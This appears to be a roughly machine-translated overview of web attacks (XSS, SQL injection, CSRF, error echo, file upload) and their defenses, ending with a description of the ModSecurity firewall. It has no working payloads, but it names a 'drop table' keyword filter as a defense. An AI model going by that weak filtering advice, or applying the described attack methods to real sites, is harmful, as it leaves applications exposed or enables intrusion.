A brief introduction to common security attack methods and defense

Common security attacks include XSS, CSRF, SQL injection, and so on, XSS: cross-site scripting attacks

Cross-site scripting attacks (Cross Site scripting), which are not confused with abbreviations for cascading style sheets (cascading style Sheets, CSS), are abbreviated as XSS for Cross-site scripting attacks. A malicious attacker inserts malicious HTML code into a Web page, when a user browses to the page, the HTML code embedded inside the Web is executed to achieve the special purpose of maliciously attacking the user, including: stealing cookies, passwords and other important data, and then forging transactions, theft of intelligence and property. attack mode reflex ' XSS: Entice a user to click into a link to embed a malicious script to attack
Persistent XSS: A malicious script is saved in a database on a Web site, and malicious scripts are executed through the normal page when the user browses
defenses: Escaping HTML dangerous characters, such as "<" escaping to "&lt", etc.
HttpOnly: General browsers prohibit page JavaScript from accessing cookies with HttpOnly properties. Use this rule to add a HttpOnly property to a cookie for sensitive information to avoid being attacked


Ii. injection of attacks

There are mainly SQL injection attacks, OS injection attacksAttack ModeAttackers primarily exploit open source software's database structure to exploit Web sites that use Open-source software.
Error Echo: If the site has error echo, the server internal 500 error will be displayed to the browser. By constructing illegal parameters, the attacker frequently obtains exception information, thus guessing the database structure
Blinds: Guessing table names and database table structures
defensiveDisinfection: Filter SQL through regular expressions, such as drop table, etc.
Parameter binding: By precompiling the SQL binding parameters, see the incoming content as an SQL parameter. The General Database Access Layer Framework (IBatis, Hibernate, etc.) implements SQL precompilation and parameter binding
Iii. CSRF cross-station request forgeryCSRF (Cross-site request forgery Cross station forgery, usually abbreviated as CSRF or XSRF, is a malicious use of the site. CSRF uses trusted Web sites by disguising requests from trusted users.

Attack ModeCSRF attacks rely on the following assumptions:
The attacker knows the site where the victim is located
The attacker's target site has a persistent authorization cookie or the victim has the current session cookie
The target site does not have a second authorization for the user's behavior on the site
defensiveGenerally through the form token, verification code, Referer check and other ways to avoid CSRF
iv. Error-EchoThe general server defaults to turn on error ECHO, providing an opportunity for attackers.
Defense
The website design specialized error interface, the server 500 error jumps to the specialized error interface
v. File upload:You need to limit the type and permissions of the uploaded document to prevent an attacker from uploading executable programs

vi. Introduction of safe open Source product modsecurityModsecurity is an intrusion detection and protection engine, which is used primarily for Web applications, and is also known as a Web application firewall, which is designed to enhance the security of Web application and protect Web application to avoid attacks from known and unknown sources. It works as a module for the Apache Web server or as a stand-alone application. The main functions:
1. HTTP Traffic Record
2, real-time monitoring and web attack detection:
3, three attack defense methods: Negative model, positive model, known vulnerabilities
4. Rule Engine

5, embedded deployment, do not change the existing network structure, the system overhead is small.